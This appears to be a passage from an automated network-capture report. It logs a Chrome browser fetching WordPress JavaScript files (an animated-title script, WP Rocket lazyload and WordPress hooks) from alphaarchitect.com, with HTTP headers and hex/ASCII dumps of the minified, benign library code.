                                                                                                                                                                                                                                                                        Data Ascii: 1716!function(t){function e(e,n,i,s){var a=e.text().split(n),l="";a.length&&(t(a).each(function(t,e){l+='<span class="'+i+(t+1)+'">'+e+"</span>"+s}),e.empty().append(l))}var n={init:function(){return this.each(function(){e(t(this),"","char","")})},words
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 73 2e 6f 75 74 45 66 66 65 63 74 73 29 3e 3d 30 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 72 65 74 75 72 6e 22 74 72 75 65 22 21 3d 3d 74 26 26 22 66 61 6c 73 65 22 21 3d 3d 74 3f 74 3a 22 74 72 75 65 22 3d 3d 3d 74 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 76 61 72 20 6e 3d 65 2e 61 74 74 72 69 62 75 74 65 73 7c 7c 5b 5d 2c 73 3d 7b 7d 3b 72 65 74 75 72 6e 20 6e 2e 6c 65 6e 67 74 68 3f 28 74 2e 65 61 63 68 28 6e 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 72 65 70 6c 61 63 65 28 2f 64 65 6c 61 79 73 63 61 6c 65 2f 2c 22 64 65 6c 61 79 53 63 61 6c 65 22 29 3b 2f 5e 64 61 74 61 2d 69 6e 2d 2a 2f 2e 74 65 73 74 28 6e 29 3f 28 73 2e 69 6e 3d 73 2e 69 6e 7c 7c 7b 7d 2c 73 2e 69 6e 5b 6e 2e 72 65 70 6c
                                                                                                                                                                                                                                                                        Data Ascii: s.outEffects)>=0}function i(t){return"true"!==t&&"false"!==t?t:"true"===t}function s(e){var n=e.attributes||[],s={};return n.length?(t.each(n,function(t,e){var n=e.nodeName.replace(/delayscale/,"delayScale");/^data-in-*/.test(n)?(s.in=s.in||{},s.in[n.repl
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 65 29 2e 73 68 6f 77 28 29 3a 74 2e 61 64 64 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 74 69 74 6c 65 2d 61 6e 69 6d 61 74 65 64 20 22 2b 65 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74 79 22 2c 22 76 69 73 69 62 6c 65 22 29 2e 73 68 6f 77 28 29 2c 22 74 79 70 65 49 6e 22 21 3d 3d 65 26 26 22 74 79 70 65 4f 75 74 22 21 3d 3d 65 7c 7c 21 6a 51 75 65 72 79 28 22 68 74 6d 6c 22 29 2e 68 61 73 43 6c 61 73 73 28 22 75 61 2d 65 64 67 65 22 29 7c 7c 28 74 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 74 69 74 6c 65 2d 61 6e 69 6d 61 74 65 64 20 22 2b 65 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74 79 22 2c 22 76 69 73 69 62 6c 65 22 29 2c 6e 26 26 6e 28 29 29 2c 74 2e 6f 6e 65 28 22 77 65 62 6b 69 74 41 6e 69 6d 61 74 69 6f 6e 45 6e 64 20
                                                                                                                                                                                                                                                                        Data Ascii: e).show():t.addClass("fusion-title-animated "+e).css("visibility","visible").show(),"typeIn"!==e&&"typeOut"!==e||!jQuery("html").hasClass("ua-edge")||(t.removeClass("fusion-title-animated "+e).css("visibility","visible"),n&&n()),t.one("webkitAnimationEnd
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 74 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 6f 2e 6f 70 74 69 6f 6e 73 2c 75 2e 6c 65 6e 67 74 68 3f 73 28 75 5b 30 5d 29 3a 7b 7d 29 2c 64 3d 6f 2e 24 63 75 72 72 65 6e 74 2e 63 6c 6f 73 65 73 74 28 22 2e 66 75 73 69 6f 6e 2d 61 6e 69 6d 61 74 65 64 2d 74 65 78 74 73 2d 77 72 61 70 70 65 72 22 29 3b 75 2e 61 64 64 43 6c 61 73 73 28 22 63 75 72 72 65 6e 74 22 29 2c 6f 2e 74 72 69 67 67 65 72 45 76 65 6e 74 28 22 69 6e 41 6e 69 6d 61 74 69 6f 6e 42 65 67 69 6e 22 29 2c 63 2e 61 74 74 72 28 22 64 61 74 61 2d 61 63 74 69 76 65 22 2c 75 2e 64 61 74 61 28 22 69 64 22 29 29 2c 22 6c 69 6e 65 22 3d 3d 6f 2e 6f 70 74 69 6f 6e 73 2e 6c 65 6e 67 74 68 3f 6f 2e 24 63 75 72 72 65 6e 74 2e 68 74 6d 6c 28 75 2e 68 74 6d 6c 28 29 29 2e 6c 65 74 74 65 72 69 6e 67 28 22
                                                                                                                                                                                                                                                                        Data Ascii: t.extend(!0,{},o.options,u.length?s(u[0]):{}),d=o.$current.closest(".fusion-animated-texts-wrapper");u.addClass("current"),o.triggerEvent("inAnimationBegin"),c.attr("data-active",u.data("id")),"line"==o.options.length?o.$current.html(u.html()).lettering("
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC933INData Raw: 69 67 67 65 72 45 76 65 6e 74 28 22 6f 75 74 41 6e 69 6d 61 74 69 6f 6e 45 6e 64 22 29 2c 63 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 64 61 74 61 2d 61 63 74 69 76 65 22 29 2c 6c 2e 6f 75 74 2e 63 61 6c 6c 62 61 63 6b 26 26 6c 2e 6f 75 74 2e 63 61 6c 6c 62 61 63 6b 28 29 2c 65 26 26 65 28 6f 29 7d 29 7d 2c 6f 2e 73 74 61 72 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 2e 74 72 69 67 67 65 72 45 76 65 6e 74 28 22 73 74 61 72 74 22 29 2c 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 6f 2e 69 6e 28 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6f 2e 24 74 65 78 74 73 2e 63 68 69 6c 64 72 65 6e 28 29 2e 6c 65 6e 67 74 68 3b 65 2b 3d 31 2c 21 6f 2e 6f 70 74 69 6f 6e 73 2e 6c 6f 6f 70 26 26
                                                                                                                                                                                                                                                                        Data Ascii: iggerEvent("outAnimationEnd"),c.removeAttr("data-active"),l.out.callback&&l.out.callback(),e&&e(o)})},o.start=function(t){setTimeout(function(){o.triggerEvent("start"),function t(e){o.in(e,function(){var n=o.$texts.children().length;e+=1,!o.options.loop&&
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        30192.168.2.449781141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC579OUTGET /wp-content/plugins/wp-rocket/assets/js/lazyload/17.8.3/lazyload.min.js HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:48 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 29 Nov 2024 17:16:38 GMT
                                                                                                                                                                                                                                                                        ETag: W/"6749f6f6-22bc"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147806
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9d35b21ef9d-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC877INData Raw: 32 32 62 63 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 6e 7c 7c 73 65 6c 66 29 2e 4c 61 7a 79 4c 6f 61 64 3d 74 28 29 7d 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 72 65 74
                                                                                                                                                                                                                                                                        Data Ascii: 22bc!function(n,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(n="undefined"!=typeof globalThis?globalThis:n||self).LazyLoad=t()}(this,(function(){"use strict";function n(){ret
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 68 69 64 70 69 3a 22 62 67 2d 68 69 64 70 69 22 2c 64 61 74 61 5f 62 67 5f 6d 75 6c 74 69 3a 22 62 67 2d 6d 75 6c 74 69 22 2c 64 61 74 61 5f 62 67 5f 6d 75 6c 74 69 5f 68 69 64 70 69 3a 22 62 67 2d 6d 75 6c 74 69 2d 68 69 64 70 69 22 2c 64 61 74 61 5f 62 67 5f 73 65 74 3a 22 62 67 2d 73 65 74 22 2c 64 61 74 61 5f 70 6f 73 74 65 72 3a 22 70 6f 73 74 65 72 22 2c 63 6c 61 73 73 5f 61 70 70 6c 69 65 64 3a 22 61 70 70 6c 69 65 64 22 2c 63 6c 61 73 73 5f 6c 6f 61 64 69 6e 67 3a 22 6c 6f 61 64 69 6e 67 22 2c 63 6c 61 73 73 5f 6c 6f 61 64 65 64 3a 22 6c 6f 61 64 65 64 22 2c 63 6c 61 73 73 5f 65 72 72 6f 72 3a 22 65 72 72 6f 72 22 2c 63 6c 61 73 73 5f 65 6e 74 65 72 65 64 3a 22 65 6e 74 65 72 65 64 22 2c 63 6c 61 73 73 5f 65 78 69 74 65 64 3a 22 65 78 69 74 65 64
                                                                                                                                                                                                                                                                        Data Ascii: hidpi:"bg-hidpi",data_bg_multi:"bg-multi",data_bg_multi_hidpi:"bg-multi-hidpi",data_bg_set:"bg-set",data_poster:"poster",class_applied:"applied",class_loading:"loading",class_loaded:"loaded",class_error:"error",class_entered:"entered",class_exited:"exited
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 6f 3f 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 74 29 3a 6e 2e 63 6c 61 73 73 4e 61 6d 65 3d 6e 2e 63 6c 61 73 73 4e 61 6d 65 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 22 28 5e 7c 5c 5c 73 2b 29 22 2b 74 2b 22 28 5c 5c 73 2b 7c 24 29 22 29 2c 22 20 22 29 2e 72 65 70 6c 61 63 65 28 2f 5e 5c 73 2b 2f 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 73 2b 24 2f 2c 22 22 29 7d 2c 7a 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 6c 6c 54 65 6d 70 49 6d 61 67 65 7d 2c 54 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 69 66 28 74 29 7b 76 61 72 20 65 3d 74 2e 5f 6f 62 73 65 72 76 65 72 3b 65 26 26 65 2e 75 6e 6f 62 73 65 72 76 65 28 6e 29 7d 7d 2c 52 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                        Data Ascii: nction(n,t){o?n.classList.remove(t):n.className=n.className.replace(new RegExp("(^|\\s+)"+t+"(\\s+|$)")," ").replace(/^\s+/,"").replace(/\s+$/,"")},z=function(n){return n.llTempImage},T=function(n,t){if(t){var e=t._observer;e&&e.unobserve(n)}},R=function(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 28 6e 2c 75 2c 79 28 6e 2c 74 2e 64 61 74 61 5f 73 72 63 29 29 7d 29 29 2c 24 28 6e 2c 46 29 2c 57 28 6e 2c 66 2c 79 28 6e 2c 74 2e 64 61 74 61 5f 70 6f 73 74 65 72 29 29 2c 57 28 6e 2c 75 2c 79 28 6e 2c 74 2e 64 61 74 61 5f 73 72 63 29 29 2c 6e 2e 6c 6f 61 64 28 29 7d 2c 4f 42 4a 45 43 54 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 24 28 6e 2c 4a 29 2c 57 28 6e 2c 67 2c 79 28 6e 2c 74 2e 64 61 74 61 5f 73 72 63 29 29 7d 7d 2c 5a 3d 5b 22 49 4d 47 22 2c 22 49 46 52 41 4d 45 22 2c 22 56 49 44 45 4f 22 2c 22 4f 42 4a 45 43 54 22 5d 2c 6e 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 21 74 7c 7c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 6c 6f 61 64 69 6e 67 43 6f 75 6e 74 3e 30 7d 28 74 29 7c 7c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72
                                                                                                                                                                                                                                                                        Data Ascii: (n,u,y(n,t.data_src))})),$(n,F),W(n,f,y(n,t.data_poster)),W(n,u,y(n,t.data_src)),n.load()},OBJECT:function(n,t){$(n,J),W(n,g,y(n,t.data_src))}},Z=["IMG","IFRAME","VIDEO","OBJECT"],nn=function(n,t){!t||function(n){return n.loadingCount>0}(t)||function(n){r
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 72 6f 75 6e 64 49 6d 61 67 65 7d 29 7d 28 6e 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 29 7b 76 61 72 20 69 3d 79 28 6e 2c 74 2e 64 61 74 61 5f 62 67 29 2c 6f 3d 79 28 6e 2c 74 2e 64 61 74 61 5f 62 67 5f 68 69 64 70 69 29 2c 72 3d 61 26 26 6f 3f 6f 3a 69 3b 72 26 26 28 6e 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 3d 27 75 72 6c 28 22 27 2e 63 6f 6e 63 61 74 28 72 2c 27 22 29 27 29 2c 7a 28 6e 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 75 2c 72 29 2c 51 28 6e 2c 74 2c 65 29 29 7d 28 6e 2c 74 2c 65 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 29 7b 76 61 72 20 69 3d 79 28 6e 2c 74 2e 64 61 74 61 5f 62 67 5f 6d 75 6c 74 69 29 2c 6f 3d 79 28 6e 2c 74 2e 64 61 74 61 5f 62 67 5f 6d 75 6c 74 69 5f 68 69 64 70 69 29 2c 72 3d 61
                                                                                                                                                                                                                                                                        Data Ascii: roundImage})}(n),function(n,t,e){var i=y(n,t.data_bg),o=y(n,t.data_bg_hidpi),r=a&&o?o:i;r&&(n.style.backgroundImage='url("'.concat(r,'")'),z(n).setAttribute(u,r),Q(n,t,e))}(n,t,e),function(n,t,e){var i=y(n,t.data_bg_multi),o=y(n,t.data_bg_multi_hidpi),r=a
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 61 67 65 45 6c 65 6d 65 6e 74 2e 70 72 6f 74 6f 74 79 70 65 7d 2c 76 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 29 7b 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2e 69 73 49 6e 74 65 72 73 65 63 74 69 6e 67 7c 7c 6e 2e 69 6e 74 65 72 73 65 63 74 69 6f 6e 52 61 74 69 6f 3e 30 7d 28 6e 29 3f 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 2c 69 29 7b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 78 2e 69 6e 64 65 78 4f 66 28 6b 28 6e 29 29 3e 3d 30 7d 28 6e 29 3b 77 28 6e 2c 22 65 6e 74 65 72 65 64 22 29 2c 4e 28 6e 2c 65 2e 63 6c 61 73 73 5f 65 6e 74 65 72 65 64 29 2c 4d 28 6e 2c 65 2e 63 6c 61 73 73 5f 65 78 69 74 65 64 29
                                                                                                                                                                                                                                                                        Data Ascii: ageElement.prototype},vn=function(n,t,e){n.forEach((function(n){return function(n){return n.isIntersecting||n.intersectionRatio>0}(n)?function(n,t,e,i){var o=function(n){return x.indexOf(k(n))>=0}(n);w(n,"entered"),N(n,e.class_entered),M(n,e.class_exited)
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1178INData Raw: 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 6e 6c 69 6e 65 22 2c 65 2e 5f 6f 6e 6c 69 6e 65 48 61 6e 64 6c 65 72 29 29 7d 28 6f 2c 74 68 69 73 29 2c 74 68 69 73 2e 75 70 64 61 74 65 28 65 29 7d 3b 72 65 74 75 72 6e 20 45 6e 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 75 70 64 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 2c 6f 2c 61 3d 74 68 69 73 2e 5f 73 65 74 74 69 6e 67 73 2c 72 3d 68 6e 28 6e 2c 61 29 3b 47 28 74 68 69 73 2c 72 2e 6c 65 6e 67 74 68 29 2c 21 65 26 26 69 3f 67 6e 28 61 29 3f 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 29 7b 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 2d 31 21 3d 3d 5f 6e 2e 69 6e 64 65 78 4f 66 28 6e 2e 74 61 67 4e 61 6d 65 29 26 26 66 75 6e 63 74 69 6f 6e 28 6e 2c 74
                                                                                                                                                                                                                                                                        Data Ascii: w.addEventListener("online",e._onlineHandler))}(o,this),this.update(e)};return En.prototype={update:function(n){var t,o,a=this._settings,r=hn(n,a);G(this,r.length),!e&&i?gn(a)?function(n,t,e){n.forEach((function(n){-1!==_n.indexOf(n.tagName)&&function(n,t
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        31192.168.2.449785141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC780OUTGET /wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:48 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 14 Nov 2024 00:24:52 GMT
                                                                                                                                                                                                                                                                        ETag: W/"67354354-12a8"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147805
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fb9d35f9d0f59-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC877INData Raw: 31 32 61 38 0d 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 64 3a 28 65 2c 6e 29 3d 3e 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29 74 2e 6f 28 6e 2c 72 29 26 26 21 74 2e 6f 28 65 2c 72 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 5b 72 5d 7d 29 7d 2c 6f 3a 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 2c 72 3a 74 3d 3e 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62
                                                                                                                                                                                                                                                                        Data Ascii: 12a8/*! This file is auto-generated */(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symb
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 61 6d 65 73 70 61 63 65 20 6d 75 73 74 20 62 65 20 61 20 6e 6f 6e 2d 65 6d 70 74 79 20 73 74 72 69 6e 67 2e 22 29 2c 21 31 29 3a 21 21 2f 5e 5b 61 2d 7a 41 2d 5a 5d 5b 61 2d 7a 41 2d 5a 30 2d 39 5f 2e 5c 2d 5c 2f 5d 2a 24 2f 2e 74 65 73 74 28 74 29 7c 7c 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 54 68 65 20 6e 61 6d 65 73 70 61 63 65 20 63 61 6e 20 6f 6e 6c 79 20 63 6f 6e 74 61 69 6e 20 6e 75 6d 62 65 72 73 2c 20 6c 65 74 74 65 72 73 2c 20 64 61 73 68 65 73 2c 20 70 65 72 69 6f 64 73 2c 20 75 6e 64 65 72 73 63 6f 72 65 73 20 61 6e 64 20 73 6c 61 73 68 65 73 2e 22 29 2c 21 31 29 7d 3b 63 6f 6e 73 74 20 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 22 22 3d 3d 3d 74 3f 28 63 6f
                                                                                                                                                                                                                                                                        Data Ascii: amespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only contain numbers, letters, dashes, periods, underscores and slashes."),!1)};const r=function(t){return"string"!=typeof t||""===t?(co
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1369INData Raw: 65 6e 67 74 68 2d 31 3b 65 3e 3d 30 3b 65 2d 2d 29 74 5b 65 5d 2e 6e 61 6d 65 73 70 61 63 65 3d 3d 3d 73 26 26 28 74 2e 73 70 6c 69 63 65 28 65 2c 31 29 2c 6c 2b 2b 2c 63 2e 5f 5f 63 75 72 72 65 6e 74 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 74 2e 6e 61 6d 65 3d 3d 3d 69 26 26 74 2e 63 75 72 72 65 6e 74 49 6e 64 65 78 3e 3d 65 26 26 74 2e 63 75 72 72 65 6e 74 49 6e 64 65 78 2d 2d 7d 29 29 29 7d 72 65 74 75 72 6e 22 68 6f 6f 6b 52 65 6d 6f 76 65 64 22 21 3d 3d 69 26 26 74 2e 64 6f 41 63 74 69 6f 6e 28 22 68 6f 6f 6b 52 65 6d 6f 76 65 64 22 2c 69 2c 73 29 2c 6c 7d 7d 3b 63 6f 6e 73 74 20 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 63 6f 6e 73 74 20 6f 3d 74 5b 65 5d 3b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                        Data Ascii: ength-1;e>=0;e--)t[e].namespace===s&&(t.splice(e,1),l++,c.__current.forEach((t=>{t.name===i&&t.currentIndex>=e&&t.currentIndex--})))}return"hookRemoved"!==i&&t.doAction("hookRemoved",i,s),l}};const s=function(t,e){return function(n,r){const o=t[e];return
                                                                                                                                                                                                                                                                        2024-12-20 12:44:48 UTC1169INData Raw: 6f 72 28 29 7b 74 68 69 73 2e 61 63 74 69 6f 6e 73 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 2c 74 68 69 73 2e 61 63 74 69 6f 6e 73 2e 5f 5f 63 75 72 72 65 6e 74 3d 6e 65 77 20 53 65 74 2c 74 68 69 73 2e 66 69 6c 74 65 72 73 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 2c 74 68 69 73 2e 66 69 6c 74 65 72 73 2e 5f 5f 63 75 72 72 65 6e 74 3d 6e 65 77 20 53 65 74 2c 74 68 69 73 2e 61 64 64 41 63 74 69 6f 6e 3d 6f 28 74 68 69 73 2c 22 61 63 74 69 6f 6e 73 22 29 2c 74 68 69 73 2e 61 64 64 46 69 6c 74 65 72 3d 6f 28 74 68 69 73 2c 22 66 69 6c 74 65 72 73 22 29 2c 74 68 69 73 2e 72 65 6d 6f 76 65 41 63 74 69 6f 6e 3d 69 28 74 68 69 73 2c 22 61 63 74 69 6f 6e 73 22 29 2c 74 68 69 73 2e 72 65 6d 6f 76 65 46 69 6c 74 65 72 3d 69 28
